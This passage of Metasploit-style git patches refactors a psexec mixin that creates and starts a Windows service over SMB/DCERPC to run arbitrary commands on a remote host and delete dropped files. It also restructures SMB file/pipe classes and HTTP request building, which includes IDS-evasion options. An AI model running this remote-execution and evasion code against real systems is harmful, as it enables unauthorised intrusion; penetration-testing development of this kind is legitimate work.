- NDR.long(0) + # Dependencies - NDR.long(0) + # Service Start - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) # Password - begin - vprint_status("#{peer} - Creating the service...") - response = dcerpc.call(0x0c, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - svc_handle = dcerpc.last_response.stub_data[0,20] - svc_status = dcerpc.last_response.stub_data[24,4] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end + NDR.long(0x0F01FF) + # Access: MAX + NDR.long(0x00000110) + # Type: Interactive, Own process + NDR.long(0x00000003) + # Start: Demand + NDR.long(0x00000000) + # Errors: Ignore + NDR.wstring( command ) + + NDR.long(0) + # LoadOrderGroup + NDR.long(0) + # Dependencies + NDR.long(0) + # Service Start + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) # Password + begin + vprint_status("#{peer} - Creating the service...") + response = dcerpc.call(0x0c, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + svc_handle = dcerpc.last_response.stub_data[0,20] + svc_status = dcerpc.last_response.stub_data[24,4] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception - end + vprint_status("#{peer} - Closing service handle...") + begin + response = dcerpc.call(0x0, svc_handle) + rescue ::Exception + end - vprint_status("#{peer} - Opening service...") - begin - stubdata = - scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) + vprint_status("#{peer} - Opening service...") + begin + stubdata = + scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) - response = dcerpc.call(0x10, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - svc_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end + response = dcerpc.call(0x10, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + svc_handle = dcerpc.last_response.stub_data[0,20] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end - vprint_status("#{peer} - Starting the service...") - stubdata = - svc_handle + NDR.long(0) + NDR.long(0) - begin - response = dcerpc.call(0x13, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end + vprint_status("#{peer} - Starting the service...") + stubdata = + svc_handle + NDR.long(0) + NDR.long(0) + begin + response = dcerpc.call(0x13, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end - vprint_status("#{peer} - Removing the service...") - stubdata = - svc_handle - begin - response = dcerpc.call(0x02, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - end + vprint_status("#{peer} - Removing the service...") + stubdata = + svc_handle + begin + response = dcerpc.call(0x02, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + end - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - end + vprint_status("#{peer} - Closing service handle...") + begin + response = dcerpc.call(0x0, svc_handle) + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + end - select(nil, nil, nil, 1.0) - simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") - return true - end + select(nil, nil, nil, 1.0) + simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") + return true + end - # This method is called by file_dropper to remove files droped - # By your module - # - # @example - # file_rm('C:\WINDOWS\Temp\output.txt') - # - # @param file [String] Full path to a file on the remote host - # @return [StandardError] only in the event of an error - def file_rm(file) - delete = "%COMSPEC% /C del #{file}" - vprint_status("#{peer} - Deleting #{file}") - psexec(delete) - end + # This method is called by file_dropper to remove files droped + # By your module + # + # @example + # file_rm('C:\WINDOWS\Temp\output.txt') + # + # @param file [String] Full path to a file on the remote host + # @return [StandardError] only in the event of an error + def file_rm(file) + delete = "%COMSPEC% /C del #{file}" + vprint_status("#{peer} - Deleting #{file}") + psexec(delete) + end - # This method stores files in an Instance array - # The files are then deleted from the remote host once - # the cleanup_after method is called - # - # @example - # register_file_for_cleanup("C:\\WINDOWS\\Temp\\output.txt") - # @param file [String] Full path to the file on the remote host - def register_file_for_cleanup(*file) - @dropped_files ||= [] - @dropped_files += file - end + # This method stores files in an Instance array + # The files are then deleted from the remote host once + # the cleanup_after method is called + # + # @example + # register_file_for_cleanup("C:\\WINDOWS\\Temp\\output.txt") + # @param file [String] Full path to the file on the remote host + def register_file_for_cleanup(*file) + @dropped_files ||= [] + @dropped_files += file + end - # This method removes any files that were dropped on the remote system - # and marked with the register_file_for_cleanup method - def cleanup_after - print_status("#{peer} - Removing files dropped by your module/exploit") - if !@dropped_files - return - end - begin - @dropped_files.delete_if do |file| - file_rm(file) - print_good("#{peer} - Deleted #{file}") - end - rescue ::Exception => cleanup_error - print_error("#{peer} - Unable to delte #{file}. #{cleanup_error}") - end - end + # This method removes any files that were dropped on the remote system + # and marked with the register_file_for_cleanup method + def cleanup_after + print_status("#{peer} - Removing files dropped by your module/exploit") + if !@dropped_files + return + end + begin + @dropped_files.delete_if do |file| + file_rm(file) + print_good("#{peer} - Deleted #{file}") + end + rescue ::Exception => cleanup_error + print_error("#{peer} - Unable to delte #{file}. #{cleanup_error}") + end + end end From 81625121f2ba68ef3ff7d76fc7f7e61e584a33f0 Mon Sep 17 00:00:00 2001 From: Royce Davis Date: Tue, 22 Jan 2013 09:49:03 -0600 Subject: [PATCH 06/87] Cleaned up some code spacing --- lib/msf/core/exploit/psexec.rb | 18 ++++-------------- 1 file changed, 4 insertions(+), 14 deletions(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index b10e1453f3..b4292004da 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb @@ -13,6 +13,7 @@ module Exploit::Remote::Psexec include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB + # Retrives output from the executed command # @param smbshare [String] The SMBshare to connect to. Usually C$ # @param ip [IP Address] Remote Host to Connect To @@ -21,7 +22,6 @@ module Exploit::Remote::Psexec # @return output or nil if fails def get_output(smbshare, ip, file) begin - print_status("Getting the command output...") simple.connect("\\\\#{ip}\\#{smbshare}") outfile = simple.open(file, 'ro') output = outfile.read @@ -42,14 +42,11 @@ module Exploit::Remote::Psexec # @param command [String] Should be a valid windows command # @return true if everything wen't well def psexec(command) - simple.connect("\\\\#{datastore['RHOST']}\\IPC$") - handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) vprint_status("#{peer} - Binding to #{handle} ...") dcerpc_bind(handle) vprint_status("#{peer} - Bound to #{handle} ...") - vprint_status("#{peer} - Obtaining a service manager handle...") scm_handle = nil stubdata = @@ -63,16 +60,13 @@ module Exploit::Remote::Psexec print_error("#{peer} - Error: #{e}") return false end - servicename = Rex::Text.rand_text_alpha(11) displayname = Rex::Text.rand_text_alpha(16) holdhandle = scm_handle svc_handle = nil svc_status = nil - stubdata = scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + - NDR.long(0x0F01FF) + # Access: MAX NDR.long(0x00000110) + # Type: Interactive, Own process NDR.long(0x00000003) + # Start: Demand @@ -96,18 +90,15 @@ module Exploit::Remote::Psexec print_error("#{peer} - Error: #{e}") return false end - vprint_status("#{peer} - Closing service handle...") begin response = dcerpc.call(0x0, svc_handle) rescue ::Exception end - vprint_status("#{peer} - Opening service...") begin stubdata = scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) - response = dcerpc.call(0x10, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil svc_handle = dcerpc.last_response.stub_data[0,20] @@ -116,7 +107,6 @@ module Exploit::Remote::Psexec print_error("#{peer} - Error: #{e}") return false end - vprint_status("#{peer} - Starting the service...") stubdata = svc_handle + NDR.long(0) + NDR.long(0) @@ -128,7 +118,6 @@ module Exploit::Remote::Psexec print_error("#{peer} - Error: #{e}") return false end - vprint_status("#{peer} - Removing the service...") stubdata = svc_handle @@ -139,19 +128,18 @@ module Exploit::Remote::Psexec rescue ::Exception => e print_error("#{peer} - Error: #{e}") end - vprint_status("#{peer} - Closing service handle...") begin response = dcerpc.call(0x0, svc_handle) rescue ::Exception => e print_error("#{peer} - Error: #{e}") end - select(nil, nil, nil, 1.0) simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") return true end + # This method is called by file_dropper to remove files droped # By your module # @@ -166,6 +154,7 @@ module Exploit::Remote::Psexec psexec(delete) end + # This method stores files in an Instance array # The files are then deleted from the remote host once # the cleanup_after method is called @@ -178,6 +167,7 @@ module Exploit::Remote::Psexec @dropped_files += file end + # This method removes any files that were dropped on the remote system # and marked with the register_file_for_cleanup method def cleanup_after From 7faaa635d380e6e510729ade4eb0a3d0aa0b35b5 Mon Sep 17 00:00:00 2001 From: Royce Davis Date: Sun, 3 Feb 2013 18:46:41 -0600 Subject: [PATCH 07/87] Fixed exception handling to use smb::proto --- lib/msf/core/exploit/psexec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index b4292004da..f63a93f8e1 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb @@ -180,7 +180,7 @@ module Exploit::Remote::Psexec file_rm(file) print_good("#{peer} - Deleted #{file}") end - rescue ::Exception => cleanup_error + rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanup_error print_error("#{peer} - Unable to delte #{file}. #{cleanup_error}") end end From a902480576a904f464b43a365cd002c81361eaf6 Mon Sep 17 00:00:00 2001 From: James Lee Date: Sun, 17 Feb 2013 06:57:35 -0600 Subject: [PATCH 08/87] Break out subclasses into their own files --- lib/rex/proto/smb/simpleclient.rb | 154 +------------------- lib/rex/proto/smb/simpleclient/open_file.rb | 106 ++++++++++++++ lib/rex/proto/smb/simpleclient/open_pipe.rb | 57 ++++++++ 3 files changed, 168 insertions(+), 149 deletions(-) create mode 100644 lib/rex/proto/smb/simpleclient/open_file.rb create mode 100644 lib/rex/proto/smb/simpleclient/open_pipe.rb diff --git a/lib/rex/proto/smb/simpleclient.rb b/lib/rex/proto/smb/simpleclient.rb index 454a3c694e..c0cd9d02e9 100644 --- a/lib/rex/proto/smb/simpleclient.rb +++ b/lib/rex/proto/smb/simpleclient.rb @@ -12,6 +12,8 @@ require 'rex/proto/smb/evasions' require 'rex/proto/smb/crypt' require 'rex/proto/smb/utils' require 'rex/proto/smb/client' +require 'rex/proto/smb/simpleclient/open_file' +require 'rex/proto/smb/simpleclient/open_pipe' # Some short-hand class aliases CONST = Rex::Proto::SMB::Constants @@ -20,157 +22,11 @@ UTILS = Rex::Proto::SMB::Utils XCEPT = Rex::Proto::SMB::Exceptions EVADE = Rex::Proto::SMB::Evasions - - class OpenFile - attr_accessor :name, :tree_id, :file_id, :mode, :client, :chunk_size - - def initialize(client, name, tree_id, file_id) - self.client = client - self.name = name - self.tree_id = tree_id - self.file_id = file_id - self.chunk_size = 48000 - end - - def delete - begin - self.close - rescue - end - self.client.delete(self.name, self.tree_id) - end - - # Close this open file - def close - self.client.close(self.file_id, self.tree_id) - end - - # Read data from the file - def read(length = nil, offset = 0) - if (length == nil) - data = '' - fptr = offset - ok = self.client.read(self.file_id, fptr, self.chunk_size) - while (ok and ok['Payload'].v['DataLenLow'] > 0) - buff = ok.to_s.slice( - ok['Payload'].v['DataOffset'] + 4, - ok['Payload'].v['DataLenLow'] - ) - data << buff - if ok['Payload'].v['Remaining'] == 0 - break - end - fptr += ok['Payload'].v['DataLenLow'] - - begin - ok = self.client.read(self.file_id, fptr, self.chunk_size) - rescue XCEPT::ErrorCode => e - case e.error_code - when 0x00050001 - # Novell fires off an access denied error on EOF - ok = nil - else - raise e - end - end - end - - return data - else - ok = self.client.read(self.file_id, offset, length) - data = ok.to_s.slice( - ok['Payload'].v['DataOffset'] + 4, - ok['Payload'].v['DataLenLow'] - ) - return data - end - end - - def << (data) - self.write(data) - end - - # Write data to the file - def write(data, offset = 0) - # Track our offset into the remote file - fptr = offset - - # Duplicate the data so we can use slice! - data = data.dup - - # Take our first chunk of bytes - chunk = data.slice!(0, self.chunk_size) - - # Keep writing data until we run out - while (chunk.length > 0) - ok = self.client.write(self.file_id, fptr, chunk) - cl = ok['Payload'].v['CountLow'] - - # Partial write, push the failed data back into the queue - if (cl != chunk.length) - data = chunk.slice(cl - 1, chunk.length - cl) + data - end - - # Increment our painter and grab the next chunk - fptr += cl - chunk = data.slice!(0, self.chunk_size) - end - end - end - - class OpenPipe < OpenFile - - # Valid modes are: 'trans' and 'rw' - attr_accessor :mode - - def initialize(*args) - super(*args) - self.mode = 'rw' - @buff = '' - end - - def read_buffer(length, offset=0) - length ||= @buff.length - @buff.slice!(0, length) - end - - def read(length = nil, offset = 0) - case self.mode - when 'trans' - read_buffer(length, offset) - when 'rw' - super(length, offset) - else - raise ArgumentError - end - end - - def write(data, offset = 0) - case self.mode - - when 'trans' - write_trans(data, offset) - when 'rw' - super(data, offset) - else - raise ArgumentError - end - end - - def write_trans(data, offset=0) - ack = self.client.trans_named_pipe(self.file_id, data) - doff = ack['Payload'].v['DataOffset'] - dlen = ack['Payload'].v['DataCount'] - @buff << ack.to_s[4+doff, dlen] - end - end - - # Public accessors -attr_accessor :last_error +attr_accessor :last_error # Private accessors -attr_accessor :socket, :client, :direct, :shares, :last_share +attr_accessor :socket, :client, :direct, :shares, :last_share # Pass the socket object and a boolean indicating whether the socket is netbios or cifs def initialize(socket, direct = false) @@ -180,7 +36,7 @@ attr_accessor :socket, :client, :direct, :shares, :last_share self.shares = { } end - def login( name = '', user = '', pass = '', domain = '', + def login(name = '', user = '', pass = '', domain = '', verify_signature = false, usentlmv2 = false, usentlm2_session = true, send_lm = true, use_lanman_key = false, send_ntlm = true, native_os = 'Windows 2000 2195', native_lm = 'Windows 2000 5.0', spnopt = {}) diff --git a/lib/rex/proto/smb/simpleclient/open_file.rb b/lib/rex/proto/smb/simpleclient/open_file.rb new file mode 100644 index 0000000000..66696dfae4 --- /dev/null +++ b/lib/rex/proto/smb/simpleclient/open_file.rb @@ -0,0 +1,106 @@ +# -*- coding: binary -*- +module Rex +module Proto +module SMB +class SimpleClient + +class OpenFile + attr_accessor :name, :tree_id, :file_id, :mode, :client, :chunk_size + + def initialize(client, name, tree_id, file_id) + self.client = client + self.name = name + self.tree_id = tree_id + self.file_id = file_id + self.chunk_size = 48000 + end + + def delete + begin + self.close + rescue + end + self.client.delete(self.name, self.tree_id) + end + + # Close this open file + def close + self.client.close(self.file_id, self.tree_id) + end + + # Read data from the file + def read(length = nil, offset = 0) + if (length == nil) + data = '' + fptr = offset + ok = self.client.read(self.file_id, fptr, self.chunk_size) + while (ok and ok['Payload'].v['DataLenLow'] > 0) + buff = ok.to_s.slice( + ok['Payload'].v['DataOffset'] + 4, + ok['Payload'].v['DataLenLow'] + ) + data << buff + if ok['Payload'].v['Remaining'] == 0 + break + end + fptr += ok['Payload'].v['DataLenLow'] + + begin + ok = self.client.read(self.file_id, fptr, self.chunk_size) + rescue XCEPT::ErrorCode => e + case e.error_code + when 0x00050001 + # Novell fires off an access denied error on EOF + ok = nil + else + raise e + end + end + end + + return data + else + ok = self.client.read(self.file_id, offset, length) + data = ok.to_s.slice( + ok['Payload'].v['DataOffset'] + 4, + ok['Payload'].v['DataLenLow'] + ) + return data + end + end + + def << (data) + self.write(data) + end + + # Write data to the file + def write(data, offset = 0) + # Track our offset into the remote file + fptr = offset + + # Duplicate the data so we can use slice! + data = data.dup + + # Take our first chunk of bytes + chunk = data.slice!(0, self.chunk_size) + + # Keep writing data until we run out + while (chunk.length > 0) + ok = self.client.write(self.file_id, fptr, chunk) + cl = ok['Payload'].v['CountLow'] + + # Partial write, push the failed data back into the queue + if (cl != chunk.length) + data = chunk.slice(cl - 1, chunk.length - cl) + data + end + + # Increment our painter and grab the next chunk + fptr += cl + chunk = data.slice!(0, self.chunk_size) + end + end +end +end +end +end +end diff --git a/lib/rex/proto/smb/simpleclient/open_pipe.rb b/lib/rex/proto/smb/simpleclient/open_pipe.rb new file mode 100644 index 0000000000..387ee4ff9a --- /dev/null +++ b/lib/rex/proto/smb/simpleclient/open_pipe.rb @@ -0,0 +1,57 @@ +# -*- coding: binary -*- + +module Rex +module Proto +module SMB +class SimpleClient + +class OpenPipe < OpenFile + + # Valid modes are: 'trans' and 'rw' + attr_accessor :mode + + def initialize(*args) + super(*args) + self.mode = 'rw' + @buff = '' + end + + def read_buffer(length, offset=0) + length ||= @buff.length + @buff.slice!(0, length) + end + + def read(length = nil, offset = 0) + case self.mode + when 'trans' + read_buffer(length, offset) + when 'rw' + super(length, offset) + else + raise ArgumentError + end + end + + def write(data, offset = 0) + case self.mode + + when 'trans' + write_trans(data, offset) + when 'rw' + super(data, offset) + else + raise ArgumentError + end + end + + def write_trans(data, offset=0) + ack = self.client.trans_named_pipe(self.file_id, data) + doff = ack['Payload'].v['DataOffset'] + dlen = ack['Payload'].v['DataCount'] + @buff << ack.to_s[4+doff, dlen] + end +end +end +end +end +end From dd26b081976491bf91a89eaa08c9a9db3bf001e5 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Sun, 17 Feb 2013 19:25:27 -0600 Subject: [PATCH 09/87] first run at Clientrequest object need a reliable object class for request_raw and request_cgi so that we can manipulate requests in a safe and sane manner. It is not a eprfect solution, but should fix what we need for the auth work. --- lib/rex/proto/http.rb | 1 + lib/rex/proto/http/client.rb | 444 ++------------------------ lib/rex/proto/http/client_request.rb | 454 +++++++++++++++++++++++++++ 3 files changed, 480 insertions(+), 419 deletions(-) create mode 100644 lib/rex/proto/http/client_request.rb diff --git a/lib/rex/proto/http.rb b/lib/rex/proto/http.rb index 1ff65061ec..85a4f31e3c 100644 --- a/lib/rex/proto/http.rb +++ b/lib/rex/proto/http.rb @@ -4,3 +4,4 @@ require 'rex/proto/http/request' require 'rex/proto/http/response' require 'rex/proto/http/client' require 'rex/proto/http/server' +require 'rex/proto/http/client_request' \ No newline at end of file diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 75ba1f9574..690cd58f4d 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,6 +8,8 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' +require 'pry' + module Rex module Proto module Http @@ -240,103 +242,32 @@ class Client # # @return [Request] def request_cgi(opts={}) - c_ag = opts['agent'] || config['agent'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' - c_body = opts['data'] || '' - c_cgi = opts['uri'] || '/' - c_conn = opts['connection'] - c_cook = opts['cookie'] || config['cookie'] - c_enc = opts['encode'] || false - c_enc_p = (opts['encode_params'] == true or opts['encode_params'].nil? ? true : false) - c_head = opts['headers'] || config['headers'] || {} - c_host = opts['vhost'] || config['vhost'] - c_meth = opts['method'] || 'GET' - c_path = opts['path_info'] - c_prot = opts['proto'] || 'HTTP' - c_qs = opts['query'] || '' - c_rawh = opts['raw_headers'] || config['raw_headers'] || '' - c_type = opts['ctype'] || 'application/x-www-form-urlencoded' - c_varg = opts['vars_get'] || {} - c_varp = opts['vars_post'] || {} - c_vers = opts['version'] || config['version'] || '1.1' + opts['agent'] ||= config['agent'] + opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' + opts['data'] ||= '' + opts['uri'] ||= '/' + opts['cookie'] ||= config['cookie'] + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['vhost'] ||= config['vhost'] + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' + opts['ctype'] ||= 'application/x-www-form-urlencoded' + opts['vars_get'] ||= {} + opts['vars_post'] ||= {} + opts['version'] = opts['version'] || config['version'] || '1.1' + opts['cgi'] = true + opts['port'] = self.port - uri = set_cgi(c_cgi) - qstr = c_qs - pstr = c_body - - if (config['pad_get_params']) - 1.upto(config['pad_get_params_count'].to_i) do |i| - qstr << '&' if qstr.length > 0 - qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) - qstr << '=' - qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) - end + if opts['encode_params'] == true or opts['encode_params'].nil? + opts['encode_params'] = true + else + opts['encode_params'] = false end - c_varg.each_pair do |var,val| - qstr << '&' if qstr.length > 0 - qstr << (c_enc_p ? set_encode_uri(var) : var) - qstr << '=' - qstr << (c_enc_p ? set_encode_uri(val) : val) - end - - if (config['pad_post_params']) - 1.upto(config['pad_post_params_count'].to_i) do |i| - rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) - rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) - pstr << '&' if pstr.length > 0 - pstr << (c_enc_p ? set_encode_uri(rand_var) : rand_var) - pstr << '=' - pstr << (c_enc_p ? set_encode_uri(rand_val) : rand_val) - end - end - - c_varp.each_pair do |var,val| - pstr << '&' if pstr.length > 0 - pstr << (c_enc_p ? set_encode_uri(var) : var) - pstr << '=' - pstr << (c_enc_p ? set_encode_uri(val) : val) - end - - req = '' - req << set_method(c_meth) - req << set_method_uri_spacer() - req << set_uri_prepend() - req << (c_enc ? set_encode_uri(uri):uri) - - if (qstr.length > 0) - req << '?' - req << qstr - end - - req << set_path_info(c_path) - req << set_uri_append() - req << set_uri_version_spacer() - req << set_version(c_prot, c_vers) - req << set_host_header(c_host) - req << set_agent_header(c_ag) - - if (c_auth.length > 0) - unless c_head['Authorization'] and c_head['Authorization'].include? "Basic" - req << set_basic_auth_header(c_auth) - end - end - - req << set_cookie_header(c_cook) - req << set_connection_header(c_conn) - req << set_extra_headers(c_head) - - req << set_content_type_header(c_type) - req << set_content_len_header(pstr.length) - req << set_chunked_header() - req << set_raw_headers(c_rawh) - req << set_body(pstr) - - request = Request.new - request.parse(req) - request.options = opts - - request + req = ClientRequest.new(opts,self.config) end # @@ -855,284 +786,6 @@ class Client pipeline end - # - # Return the encoded URI - # ['none','hex-normal', 'hex-all', 'u-normal', 'u-all'] - def set_encode_uri(uri) - a = uri - self.config['uri_encode_count'].times { - a = Rex::Text.uri_encode(a, self.config['uri_encode_mode']) - } - return a - end - - # - # Return the encoded query string - # - def set_encode_qs(qs) - a = qs - self.config['uri_encode_count'].times { - a = Rex::Text.uri_encode(a, self.config['uri_encode_mode']) - } - return a - end - - # - # Return the uri - # - def set_uri(uri) - - if (self.config['uri_dir_self_reference']) - uri.gsub!('/', '/./') - end - - if (self.config['uri_dir_fake_relative']) - buf = "" - uri.split('/').each do |part| - cnt = rand(8)+2 - 1.upto(cnt) { |idx| - buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) - } - buf << ("/.." * cnt) - buf << "/" + part - end - uri = buf - end - - if (self.config['uri_full_url']) - url = self.ssl ? "https" : "http" - url << self.config['vhost'] - url << ((self.port == 80) ? "" : ":#{self.port}") - url << uri - url - else - uri - end - end - - # - # Return the cgi - # - def set_cgi(uri) - - if (self.config['uri_dir_self_reference']) - uri.gsub!('/', '/./') - end - - if (self.config['uri_dir_fake_relative']) - buf = "" - uri.split('/').each do |part| - cnt = rand(8)+2 - 1.upto(cnt) { |idx| - buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) - } - buf << ("/.." * cnt) - buf << "/" + part - end - uri = buf - end - - url = uri - - if (self.config['uri_full_url']) - url = self.ssl ? "https" : "http" - url << self.config['vhost'] - url << (self.port == 80) ? "" : ":#{self.port}" - url << uri - end - - url - end - - # - # Return the HTTP method string - # - def set_method(method) - ret = method - - if (self.config['method_random_valid']) - ret = ['GET', 'POST', 'HEAD'][rand(3)] - end - - if (self.config['method_random_invalid']) - ret = Rex::Text.rand_text_alpha(rand(20)+1) - end - - if (self.config['method_random_case']) - ret = Rex::Text.to_rand_case(ret) - end - - ret - end - - # - # Return the HTTP version string - # - def set_version(protocol, version) - ret = protocol + "/" + version - - if (self.config['version_random_valid']) - ret = protocol + "/" + ['1.0', '1.1'][rand(2)] - end - - if (self.config['version_random_invalid']) - ret = Rex::Text.rand_text_alphanumeric(rand(20)+1) - end - - if (self.config['version_random_case']) - ret = Rex::Text.to_rand_case(ret) - end - - ret << "\r\n" - end - - # - # Return the HTTP seperator and body string - # - def set_body(data) - return "\r\n" + data if self.config['chunked_size'] == 0 - str = data.dup - chunked = '' - while str.size > 0 - chunk = str.slice!(0,rand(self.config['chunked_size']) + 1) - chunked << sprintf("%x", chunk.size) + "\r\n" + chunk + "\r\n" - end - "\r\n" + chunked + "0\r\n\r\n" - end - - # - # Return the HTTP path info - # TODO: - # * Encode path information - def set_path_info(path) - path ? path : '' - end - - # - # Return the spacing between the method and uri - # - def set_method_uri_spacer - len = self.config['pad_method_uri_count'].to_i - set = " " - buf = "" - - case self.config['pad_method_uri_type'] - when 'tab' - set = "\t" - when 'apache' - set = "\t \x0b\x0c\x0d" - end - - while(buf.length < len) - buf << set[ rand(set.length) ] - end - - return buf - end - - # - # Return the spacing between the uri and the version - # - def set_uri_version_spacer - len = self.config['pad_uri_version_count'].to_i - set = " " - buf = "" - - case self.config['pad_uri_version_type'] - when 'tab' - set = "\t" - when 'apache' - set = "\t \x0b\x0c\x0d" - end - - while(buf.length < len) - buf << set[ rand(set.length) ] - end - - return buf - end - - # - # Return the padding to place before the uri - # - def set_uri_prepend - prefix = "" - - if (self.config['uri_fake_params_start']) - prefix << '/%3fa=b/../' - end - - if (self.config['uri_fake_end']) - prefix << '/%20HTTP/1.0/../../' - end - - prefix - end - - # - # Return the padding to place before the uri - # - def set_uri_append - # TODO: - # * Support different padding types - "" - end - - # - # Return the HTTP Host header - # - def set_host_header(host=nil) - return "" if self.config['uri_full_url'] - host ||= self.config['vhost'] - - # IPv6 addresses must be placed in brackets - if Rex::Socket.is_ipv6?(host) - host = "[#{host}]" - end - - # The port should be appended if non-standard - if not [80,443].include?(self.port) - host = host + ":#{port}" - end - - set_formatted_header("Host", host) - end - - # - # Return the HTTP agent header - # - def set_agent_header(agent) - agent ? set_formatted_header("User-Agent", agent) : "" - end - - # - # Return the HTTP cookie header - # - def set_cookie_header(cookie) - cookie ? set_formatted_header("Cookie", cookie) : "" - end - - # - # Return the HTTP connection header - # - def set_connection_header(conn) - conn ? set_formatted_header("Connection", conn) : "" - end - - # - # Return the content type header - # - def set_content_type_header(ctype) - set_formatted_header("Content-Type", ctype) - end - - # - # Return the content length header - def set_content_len_header(clen) - return "" if self.config['chunked_size'] > 0 - set_formatted_header("Content-Length", clen) - end - # # Return the Authorization basic-auth header # @@ -1140,53 +793,6 @@ class Client auth ? set_formatted_header("Authorization", "Basic " + Rex::Text.encode_base64(auth)) : "" end - # - # Return a string of formatted extra headers - # - def set_extra_headers(headers) - buf = '' - - if (self.config['pad_fake_headers']) - 1.upto(self.config['pad_fake_headers_count'].to_i) do |i| - buf << set_formatted_header( - Rex::Text.rand_text_alphanumeric(rand(32)+1), - Rex::Text.rand_text_alphanumeric(rand(32)+1) - ) - end - end - - headers.each_pair do |var,val| - buf << set_formatted_header(var, val) - end - - buf - end - - def set_chunked_header() - return "" if self.config['chunked_size'] == 0 - set_formatted_header('Transfer-Encoding', 'chunked') - end - - # - # Return a string of raw header data - # - def set_raw_headers(data) - data - end - - # - # Return a formatted header string - # - def set_formatted_header(var, val) - if (self.config['header_folding']) - "#{var}:\r\n\t#{val}\r\n" - else - "#{var}: #{val}\r\n" - end - end - - - # # The client request configuration # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb new file mode 100644 index 0000000000..cb76327f2b --- /dev/null +++ b/lib/rex/proto/http/client_request.rb @@ -0,0 +1,454 @@ +# -*- coding: binary -*- +require 'uri' +require 'rex/proto/http' + +module Rex +module Proto +module Http + +class ClientRequest + + attr_accessor :authorization + attr_accessor :cgi + attr_accessor :config + attr_accessor :connection + attr_accessor :content_type + attr_accessor :cookie + attr_accessor :data + attr_accessor :encode + attr_accessor :encode_params + attr_accessor :headers + attr_accessor :host + attr_accessor :method + attr_accessor :path + attr_accessor :port + attr_accessor :protocol + attr_accessor :query + attr_accessor :raw_headers + attr_accessor :uri + attr_accessor :user_agent + attr_accessor :vars_get + attr_accessor :vars_post + attr_accessor :version + + def initialize(opts={}, client_config) + @cgi = opts['cgi'] + @config = client_config + @connection = opts['connection'] + @content_type = opts['ctype'] + @cookie = opts['cookie'] + @data = opts['data'] + @encode = opts['encode'] + @encode_params = opts['encode_params'] + @headers = opts['headers'] + @host = opts['vhost'] + @method = opts['method'] + @path = opts['path_info'] + @port = opts['port'] + @protocol = opts['proto'] + @query = opts['query'] + @raw_headers = opts['raw_headers'] + @uri = opts['uri'] + @user_agent = opts['agent'] + @vars_get = opts['vars_get'] + @vars_post = opts['vars_post'] + @version = opts['version'] + end + + def to_s + + # Start GET query string + qstr = query + + # Start POST data string + pstr = data + + if cgi == true + uri_str= set_cgi + + if (config['pad_get_params']) + 1.upto(config['pad_get_params_count'].to_i) do |i| + qstr << '&' if qstr.length > 0 + qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) + qstr << '=' + qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) + end 